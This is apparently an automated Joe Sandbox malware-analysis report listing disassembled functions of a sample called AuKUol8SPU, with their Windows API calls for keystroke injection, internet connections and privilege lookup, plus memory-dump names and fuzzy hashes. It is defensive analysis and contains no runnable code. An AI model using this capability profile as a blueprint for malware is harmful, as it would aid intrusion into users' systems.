Opcode ID: 7b1a403492edb26b656e50ba3451350101f93ab961547b011fbbe63f18c72ce6
Instruction ID: a668c48aa716c23b087a40e44272910c9cef381bf85852e14c8daa19a72d5ae4
Opcode Fuzzy Hash: 7b1a403492edb26b656e50ba3451350101f93ab961547b011fbbe63f18c72ce6
Instruction Fuzzy Hash: 8441C334700200AFEB50BF24DC96FBA77E4EF15B10F4480ACFA19AB2D2DA709D408791

Function 00B8641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B9F910), ref: 00B864A7
_strlen.LIBCMT ref: 00B864D9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e8798b5b920f54a2537c22d019a16ac44780af16dc122f3cdd12682fe6b0f23e
Instruction ID: e2f5870e5fb2e745d95551506c462e3494c7075d216a79eb17e8942e4a45f36a
Opcode Fuzzy Hash: e8798b5b920f54a2537c22d019a16ac44780af16dc122f3cdd12682fe6b0f23e
Instruction Fuzzy Hash: 99415131A04108ABCB14FBA4DC95EFEB7E9AF54310F5481A5F819972A2DB30EE44C751

Function 00B7B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B7B89E
GetLastError.KERNEL32(?,00000000), ref: 00B7B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B7B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B7B915

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 4573f6582f1bc1890956ff11bb4a80dbceb9321393541463a1739290e0237bab
Instruction ID: 3f279aa0f599de6ccd56ffe81bde5847deb4759e6e5602a1d98142735402f34a
Opcode Fuzzy Hash: 4573f6582f1bc1890956ff11bb4a80dbceb9321393541463a1739290e0237bab
Instruction Fuzzy Hash: F8411735600551DFCB10EF15C594A99BBE1EF8A360F49C0D8ED5A9B362CB30EE41CB91

Function 00B9AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B9AB60
GetWindowRect.USER32(?,?), ref: 00B9ABD6
PtInRect.USER32(?,?,00B9C014), ref: 00B9ABE6
MessageBeep.USER32(00000000), ref: 00B9AC57

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 1a14b3e008b4b2213c7b73825885bb768c2ece23baf159759fa9d870f1793db3
Instruction ID: 92012e5ebe1a3ea879ef22015782f4c1b4e4a17ad5165ddc900d794ababb0f01
Opcode Fuzzy Hash: 1a14b3e008b4b2213c7b73825885bb768c2ece23baf159759fa9d870f1793db3
Instruction Fuzzy Hash: 59415B306006199FCF21DF58D894A69BBF5FB49310F1880BAE815DF265DB31E941DB92

Function 00B70AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B70B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00B70B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B70BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B70BFB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5f20b576025c4d2d88731f2bf10dc741d50d496fb05b7f90d5de654379424851
Instruction ID: 7a3ea2c2c0514564fa8262b9ae0e7233d8823144ae57d6925bb6d654f66ecf29
Opcode Fuzzy Hash: 5f20b576025c4d2d88731f2bf10dc741d50d496fb05b7f90d5de654379424851
Instruction Fuzzy Hash: 75314B70964208EEFB30AB25CC05BFABBE6EB45324F14C2DBE4A9923D1C3748A409751

Function 00B70C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00B70C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B70C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B70CE1
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00B70D33

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f06219d619b4a3d787e1d536febeded615328c9c54ad545aab160ae2b1e123b5
Instruction ID: 2e67e5d3a4b8c551d89dcbff83fc6d5a0991c69347550f6dbdac32f0e706d6ab
Opcode Fuzzy Hash: f06219d619b4a3d787e1d536febeded615328c9c54ad545aab160ae2b1e123b5
Instruction Fuzzy Hash: 2E314830910308EEFF31AA7988047FEBBE6EB45320F14C3EBE4A8921D1C37999559751

Function 00B461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B461FB
__isleadbyte_l.LIBCMT ref: 00B46229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B46257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B4628D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3c160d3a443a8f3eb58b586314df46c2efd64491528438f0f1537063c4af5ea9
Instruction ID: e0ee5039d88525a36c413ee30b42930b1035c2fe94a4ddf17f70fa912eba651e
Opcode Fuzzy Hash: 3c160d3a443a8f3eb58b586314df46c2efd64491528438f0f1537063c4af5ea9
Instruction Fuzzy Hash: F931CF30600256BFDF218F64CC44BBA7BF9FF42310F1540A9E864971A1EB71DA50EB92

Function 00B94EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B94F02

Part of subcall function 00B73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B7365B
Part of subcall function 00B73641: GetCurrentThreadId.KERNEL32 ref: 00B73662
Part of subcall function 00B73641: AttachThreadInput.USER32(00000000,?,00B75005), ref: 00B73669

GetCaretPos.USER32(?), ref: 00B94F13
ClientToScreen.USER32(00000000,?), ref: 00B94F4E
GetForegroundWindow.USER32 ref: 00B94F54

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c2757b8e54f183cfb4a15a3de99637c1eadf2a4fb1dae17342ee721351bd4d37
Instruction ID: e9e413748e26624fbd80e42f8b97f1f87508a3a526f183c823f6513bd363603d
Opcode Fuzzy Hash: c2757b8e54f183cfb4a15a3de99637c1eadf2a4fb1dae17342ee721351bd4d37
Instruction Fuzzy Hash: 16310D72D00108AFDB00EFA5C9859EFB7F9EF99300F5044AAE415E7241DA759E458BA0

Function 00B9C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

GetCursorPos.USER32(?), ref: 00B9C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B4B9AB,?,?,?,?,?), ref: 00B9C4E7
GetCursorPos.USER32(?), ref: 00B9C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B4B9AB,?,?,?), ref: 00B9C56E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 48651e7d0bac30a9d88f5fd972d045d49ad2b0d51ea45dc0b1a043001219de58
Instruction ID: e8e2b6f92fdaaefad01d2154c5e6738dc035267ef26dd2cf641e3e90e5fcb001
Opcode Fuzzy Hash: 48651e7d0bac30a9d88f5fd972d045d49ad2b0d51ea45dc0b1a043001219de58
Instruction Fuzzy Hash: 63319135600058AFCF258F58C899EFE7FF5EB19320F4540AAF9058B261CB31AD50DBA4

Function 00B68656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B68121
Part of subcall function 00B6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B6812B
Part of subcall function 00B6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6813A
Part of subcall function 00B6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68141
Part of subcall function 00B6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B686A3
_memcmp.LIBCMT ref: 00B686C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B686FC
HeapFree.KERNEL32(00000000), ref: 00B68703

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 7738dbf8cb0f36028ad70493e0ded75bf179967e45d921faff7263d7e539343e
Instruction ID: 43488411378fc2edd9e1b178b7e057db16bf4fd3295f74af10c3d65627240304
Opcode Fuzzy Hash: 7738dbf8cb0f36028ad70493e0ded75bf179967e45d921faff7263d7e539343e
Instruction Fuzzy Hash: BD219D71E00109EFDB10DFA8CA49BEEB7F9EF44314F158199E548AB250DB75AE05CB90

Function 00B3098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00B309AE

Part of subcall function 00B15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B77896,?,?,00000000), ref: 00B15A2C
Part of subcall function 00B15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B77896,?,?,00000000,?,?), ref: 00B15A50

_fprintf.LIBCMT ref: 00B309E5
OutputDebugStringW.KERNEL32(?), ref: 00B65DBB

Part of subcall function 00B34AAA: _flsall.LIBCMT ref: 00B34AC3

__setmode.LIBCMT ref: 00B30A1A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 70d655d5cc76b3120d8654b7560cf4cd00a4df8a712b3213cedcffe82f17a852
Instruction ID: 46d066eb91a2a18b295e39df3c996e54b0a785f6b7fe60cd7a154ee172fd6f62
Opcode Fuzzy Hash: 70d655d5cc76b3120d8654b7560cf4cd00a4df8a712b3213cedcffe82f17a852
Instruction Fuzzy Hash: DC110531904204AFDB04B6B8AC869FE77E8DF82360F7401E5F10557192EF20599647A1

Function 00B81767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B817A3

Part of subcall function 00B8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B8184C
Part of subcall function 00B8182D: InternetCloseHandle.WININET(00000000), ref: 00B818E9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 9b362f881867611eb8836564c71a13f4303cf0087640f12ed91bf2703eb52aad
Instruction ID: 90797b381c3978230acd40de5d164c9dbe36c33ba48cfb9701eacaf212fe2bbb
Opcode Fuzzy Hash: 9b362f881867611eb8836564c71a13f4303cf0087640f12ed91bf2703eb52aad
Instruction Fuzzy Hash: DD21CF75201602BFEB12AF649C41FBABBEDFF48710F10446AFA01D6660DB71D812DBA0

Function 00B73A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B9FAC0), ref: 00B73A64
GetLastError.KERNEL32 ref: 00B73A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B73A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B9FAC0), ref: 00B73ADF

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 66e6d8a985050562ba5ccfd3137caee0fd5c1216638292d4d520e45ec07bc887
Instruction ID: 2f5c209095ba8c274a0497f14cc694887f63788e100b68d25dcaab9db6b89638
Opcode Fuzzy Hash: 66e6d8a985050562ba5ccfd3137caee0fd5c1216638292d4d520e45ec07bc887
Instruction Fuzzy Hash: FC21A6745482029F8710DF24C8828AE77E8EF55764F108AAEF4ADC72A1DB31DE45DB52

Function 00B450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B45101

Part of subcall function 00B3571C: __FF_MSGBANNER.LIBCMT ref: 00B35733
Part of subcall function 00B3571C: __NMSG_WRITE.LIBCMT ref: 00B3573A
Part of subcall function 00B3571C: RtlAllocateHeap.NTDLL(016F0000,00000000,00000001,00000000,?,?,?,00B30DD3,?), ref: 00B3575F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 1d389cc587a0eec3311fe06e8088e8a729b2dc9b5376e7c6a70b10b482d02218
Instruction ID: 5ac8bda50d4d4573dbf1b5bed2332ab4170440a6a4686480db7fa97286fe5289
Opcode Fuzzy Hash: 1d389cc587a0eec3311fe06e8088e8a729b2dc9b5376e7c6a70b10b482d02218
Instruction Fuzzy Hash: 5F113672904F06AFCB312F70AC45B6E77C89F04360F3005BAF904AB152EE348A40A795

Function 00B144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B144CF

Part of subcall function 00B1407C: _memset.LIBCMT ref: 00B140FC
Part of subcall function 00B1407C: _wcscpy.LIBCMT ref: 00B14150
Part of subcall function 00B1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B14160

KillTimer.USER32(?,00000001,?,?), ref: 00B14524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B14533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B4D4B9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: eeff15c3be55cbd0bcd51233020593c21ddb1c611a981484b7eba83043cfe922
Instruction ID: e57640cb874b04391a2cb3f0ed54e60037b11c02a9a08377fa11863bf5faa20e
Opcode Fuzzy Hash: eeff15c3be55cbd0bcd51233020593c21ddb1c611a981484b7eba83043cfe922
Instruction Fuzzy Hash: 2D210470904784AFE7328B248899BE6BBECEF15314F0400DEE68E97281C7746A84DB41

Function 00B86369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B77896,?,?,00000000), ref: 00B15A2C
Part of subcall function 00B15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B77896,?,?,00000000,?,?), ref: 00B15A50

gethostbyname.WSOCK32(?,?,?), ref: 00B86399
WSAGetLastError.WSOCK32(00000000), ref: 00B863A4
_memmove.LIBCMT ref: 00B863D1
inet_ntoa.WSOCK32(?), ref: 00B863DC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 5986a936defc793c17cc77043cbfc1d614c622e66e549655d8bb3c658bbf8628
Instruction ID: cc471b90855bd539bca2ad32df8d119f62993ea185de60e923ed8c6d61fdfa19
Opcode Fuzzy Hash: 5986a936defc793c17cc77043cbfc1d614c622e66e549655d8bb3c658bbf8628
Instruction Fuzzy Hash: 3C110A31A00109EFCB04FBA4DD96DEEB7F8AF55320B5440A5F506A7261DB30AE54DB61

Function 00B68B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B68B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B68B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B68B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B68BA4

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e37c78ded2f013b66812cf62b282676b4c89bff5c109b596fb4a7d17876faddd
Instruction ID: 2144239ba8bb64f3e6f04cbdb83e684024edbc6fdcf79aec5cf28826dcc3d2e7
Opcode Fuzzy Hash: e37c78ded2f013b66812cf62b282676b4c89bff5c109b596fb4a7d17876faddd
Instruction Fuzzy Hash: 19114C79900218FFDB10DF95CD84FADBBB4FB48310F204195EA00B7250DA716E10DB94

Function 00B11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,00000020,?), ref: 00B112D8
GetClientRect.USER32(?,?), ref: 00B4B5FB
GetCursorPos.USER32(?), ref: 00B4B605
ScreenToClient.USER32(?,?), ref: 00B4B610

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

